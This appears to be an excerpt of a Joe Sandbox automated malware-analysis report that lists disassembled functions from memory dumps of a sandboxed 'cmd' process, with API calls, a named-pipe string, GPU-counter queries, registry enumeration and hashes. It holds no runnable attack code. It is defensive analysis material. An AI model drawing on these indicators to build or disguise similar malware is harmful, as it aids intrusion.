LoadLibraryExW.KERNEL32(?,?,00000000,000001F1197DF2CD), ref: 000001F1197DF049
VirtualProtect.KERNEL32 ref: 000001F1197DF0A5
VirtualProtect.KERNEL32 ref: 000001F1197DF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001F1197DF2CD), ref: 000001F1197DF11A
GetProcAddress.KERNEL32(?,?,00000000,000001F1197DF2CD), ref: 000001F1197DF126

Strings

api-ms-, xrefs: 000001F1197DF01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001F1197DF157, 000001F1197DF165
ext-ms-, xrefs: 000001F1197DF02E

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 47eb260d83f947d9951279eac6b7b9afad2cdffc67d9e58a704b903fa02ab741
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 01516932719616E1EE559B76A8003F96292AF48BF0FD80735DF3B473D0EB38D9498A40

Function 000001F119D533A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001F119D533FD
GetProcessHeap.KERNEL32 ref: 000001F119D53412
HeapAlloc.KERNEL32 ref: 000001F119D53420
PdhGetCounterInfoW.PDH ref: 000001F119D53436
StrCmpW.SHLWAPI ref: 000001F119D5344B

Part of subcall function 000001F119D53950: StrCmpNW.SHLWAPI ref: 000001F119D53972
Part of subcall function 000001F119D53950: StrStrW.SHLWAPI ref: 000001F119D53990
Part of subcall function 000001F119D53950: StrToIntW.SHLWAPI ref: 000001F119D539B7

GetProcessHeap.KERNEL32 ref: 000001F119D53488
HeapFree.KERNEL32 ref: 000001F119D53496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001F119D53444

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 8a52228095cb946ec881046b2584f4010f411966a4848eb1bf7a5f8166f45f0e
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: CB319132A08A4AE7FF21CF72A8047A9E3A2B788B95FC40535DF5A43624DF38C855C740

Function 000001F1197D33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001F1197D33FD
GetProcessHeap.KERNEL32 ref: 000001F1197D3412
HeapAlloc.KERNEL32 ref: 000001F1197D3420
PdhGetCounterInfoW.PDH ref: 000001F1197D3436
StrCmpW.SHLWAPI ref: 000001F1197D344B

Part of subcall function 000001F1197D3950: StrCmpNW.SHLWAPI ref: 000001F1197D3972
Part of subcall function 000001F1197D3950: StrStrW.SHLWAPI ref: 000001F1197D3990
Part of subcall function 000001F1197D3950: StrToIntW.SHLWAPI ref: 000001F1197D39B7

GetProcessHeap.KERNEL32 ref: 000001F1197D3488
HeapFree.KERNEL32 ref: 000001F1197D3496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001F1197D3444

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 4e4846ce418576d2f629f8eefc456ebf6f0bf1397dcb8ec5c4b287d0cae48069
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: A531A932608A56E6EB11CF22A4047B9A3A2FB44BD9F844535DF5A47624EF3CC4598B40

Function 000001F119D534B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001F119D53516
GetProcessHeap.KERNEL32 ref: 000001F119D53527
HeapAlloc.KERNEL32 ref: 000001F119D53535
PdhGetCounterInfoW.PDH ref: 000001F119D5354B
StrCmpW.SHLWAPI ref: 000001F119D53560

Part of subcall function 000001F119D53950: StrCmpNW.SHLWAPI ref: 000001F119D53972
Part of subcall function 000001F119D53950: StrStrW.SHLWAPI ref: 000001F119D53990
Part of subcall function 000001F119D53950: StrToIntW.SHLWAPI ref: 000001F119D539B7

GetProcessHeap.KERNEL32 ref: 000001F119D5358D
HeapFree.KERNEL32 ref: 000001F119D5359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001F119D53559

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 9d7230192dae0765803238de90f1fdd82bf709c996ed0d979ea3e300906ee528
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: AD318971608B4AEAFB10DF72A8847A9A3A2B794F84FC450349F6B43724EE38C481C740

Function 000001F1197D34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000001F1197D3516
GetProcessHeap.KERNEL32 ref: 000001F1197D3527
HeapAlloc.KERNEL32 ref: 000001F1197D3535
PdhGetCounterInfoW.PDH ref: 000001F1197D354B
StrCmpW.SHLWAPI ref: 000001F1197D3560

Part of subcall function 000001F1197D3950: StrCmpNW.SHLWAPI ref: 000001F1197D3972
Part of subcall function 000001F1197D3950: StrStrW.SHLWAPI ref: 000001F1197D3990
Part of subcall function 000001F1197D3950: StrToIntW.SHLWAPI ref: 000001F1197D39B7

GetProcessHeap.KERNEL32 ref: 000001F1197D358D
HeapFree.KERNEL32 ref: 000001F1197D359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001F1197D3559

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: b9ae2af24d5bb8061eb76b84ac2ac6470890a9b0192b0f9bfd9d81898a83f1d1
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 14313032618B56E6EB50DF32A8447A963E2BB84FD8F844135DF6B47764EE38D449CA00

Function 000001F119D5A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001F119D5A289

Part of subcall function 000001F119D5B144: __GetUnwindTryBlock.LIBCMT ref: 000001F119D5B187
Part of subcall function 000001F119D5B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001F119D5B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001F119D5A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001F119D5A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001F119D5A6BC

Strings

csm, xrefs: 000001F119D5A2A3
csm, xrefs: 000001F119D5A384
csm, xrefs: 000001F119D5A30A

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 956886b8d74ceb89ec255d7f6f2610a4a7f8dd5cf9ed0982d98e959ccf36dd46
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 08D18B72608B9AEAFF20DB7594403ED37B2F755788F901125EBAA57B9ACB34C580C701

Function 000001F1197DA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001F1197DA289

Part of subcall function 000001F1197DB144: __GetUnwindTryBlock.LIBCMT ref: 000001F1197DB187
Part of subcall function 000001F1197DB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001F1197DB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001F1197DA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001F1197DA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001F1197DA6BC

Strings

csm, xrefs: 000001F1197DA30A
csm, xrefs: 000001F1197DA384
csm, xrefs: 000001F1197DA2A3

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: daaeb4a7031d024ee919a440eda3750c61dd45222f3391b5a01005575d5b02da
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: C9D16D33608781EAEB24AF7594403ED77E2FB457C8F940125EBAA57B95DB34C589CB00

Function 000001F11979962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001F119799689

Part of subcall function 000001F11979A544: __GetUnwindTryBlock.LIBCMT ref: 000001F11979A587
Part of subcall function 000001F11979A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001F11979A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001F119799761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001F1197999AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001F119799ABC

Strings

csm, xrefs: 000001F11979970A
csm, xrefs: 000001F119799784
csm, xrefs: 000001F1197996A3

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: a4c62bda3e9128b7e8f56f835762bc80b6ea39d921376139b8383329f43091ac
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 3ED16D32608742E6FB60DF7594413ED77A1FB957E8F900125EBAA57B96EB34C088CB01

Function 000001F119D5104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F119D510B1
RegEnumValueW.ADVAPI32 ref: 000001F119D51117
GetProcessHeap.KERNEL32 ref: 000001F119D5115A
HeapAlloc.KERNEL32 ref: 000001F119D51168
GetProcessHeap.KERNEL32 ref: 000001F119D51185
HeapFree.KERNEL32 ref: 000001F119D51193

Strings

d, xrefs: 000001F119D510D6

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 53e51993aeb7cd1e9d6dbc38ab9465e2a4542951f5d9dd34a00bdcd5e7a7f30f
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 37414F32218B85D6EB60CF71E4447AA77B2F388B98F848125DB9A47758DF3CC589CB40

Function 000001F1197D104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F1197D10B1
RegEnumValueW.ADVAPI32 ref: 000001F1197D1117
GetProcessHeap.KERNEL32 ref: 000001F1197D115A
HeapAlloc.KERNEL32 ref: 000001F1197D1168
GetProcessHeap.KERNEL32 ref: 000001F1197D1185
HeapFree.KERNEL32 ref: 000001F1197D1193

Strings

d, xrefs: 000001F1197D10D6

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 4c70f55e1ef05f4c03a3928169953ca9c1495ccbcec95566e5fc7600a5465d3f
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 0B415E33218B85D6E764CF31E4443AE77A2F788B98F848129DB9A07758EF39C549CB40

Function 000001F119D52518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001F119D5252D
GetCurrentProcessId.KERNEL32 ref: 000001F119D52537
CreateFileW.KERNEL32 ref: 000001F119D52568
WriteFile.KERNEL32 ref: 000001F119D52590
ReadFile.KERNEL32 ref: 000001F119D525AF
CloseHandle.KERNEL32 ref: 000001F119D525B8

Strings

\\.\pipe\$cnt-childproc, xrefs: 000001F119D52549

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$cnt-childproc
API String ID: 166002920-175842701
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 3ed497377569788ce0e07239fb4fd65972ff783c0209c07871c134d3bd714327
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: FB113D31618B45D2FB108B31F5543A97762F389BD4FD40325EB6A02AA8CF3CC148CB80

Function 000001F1197D2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001F1197D252D
GetCurrentProcessId.KERNEL32 ref: 000001F1197D2537
CreateFileW.KERNEL32 ref: 000001F1197D2568
WriteFile.KERNEL32 ref: 000001F1197D2590
ReadFile.KERNEL32 ref: 000001F1197D25AF
CloseHandle.KERNEL32 ref: 000001F1197D25B8

Strings

\\.\pipe\$cnt-childproc, xrefs: 000001F1197D2549

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$cnt-childproc
API String ID: 166002920-175842701
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: ef1304914087ab27613cefec701475e7a685d52c3e90f6566692f92bf592e213
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: A2117F32618755D2EB10CB31F4543A97761FB89BD4F940320EB6A02AA8DF3CC549CF40

Function 000001F119D57C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001F119D57C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001F119D57CCA
_RTC_Initialize.LIBCMT ref: 000001F119D57CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001F119D57D1E
__scrt_release_startup_lock.LIBCMT ref: 000001F119D57D49

Memory Dump Source

Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true

Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 3d4eae2c4b73e38361e66ec47bccb731964f3b6350fc7dcc08109cfba711b831
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 0D81B03060C74FE6FE54AB76D4423F966B3AB85B84FE54035AB2B87396DB38C8458701

Function 000001F1197D7C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001F1197D7C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001F1197D7CCA
_RTC_Initialize.LIBCMT ref: 000001F1197D7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001F1197D7D1E
__scrt_release_startup_lock.LIBCMT ref: 000001F1197D7D49

Memory Dump Source

Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true

Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 0b05e2dc5e0d5619263ced3579970e4d68fedc4c9f392093c82c68063e5203eb
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 0C818D72608283E6FA619B7598413FDA2D3AF857C4FD44035DB2B47396EB38C84D8E01

Function 000001F119797050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001F119797078
__scrt_acquire_startup_lock.LIBCMT ref: 000001F1197970CA
_RTC_Initialize.LIBCMT ref: 000001F1197970F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001F11979711E
__scrt_release_startup_lock.LIBCMT ref: 000001F119797149

Memory Dump Source

Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: a48c0dbe5ec7c2d48a4e53f4845102c0e03c8a4f8b35e210cab47a38fb375f58
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: C0818331618243E6FA549B7598413F9A293EF86BE4FC84135DB2B47796FA28C94D8F00

Function 000001F119D59AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59B31
GetLastError.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59B3F
LoadLibraryExW.KERNEL32(?,?,?,000001F119D59C6B,?,?,?,000001F119D5945C,?,?,?,?,000001F119D58F65), ref: 000001F119D59B69
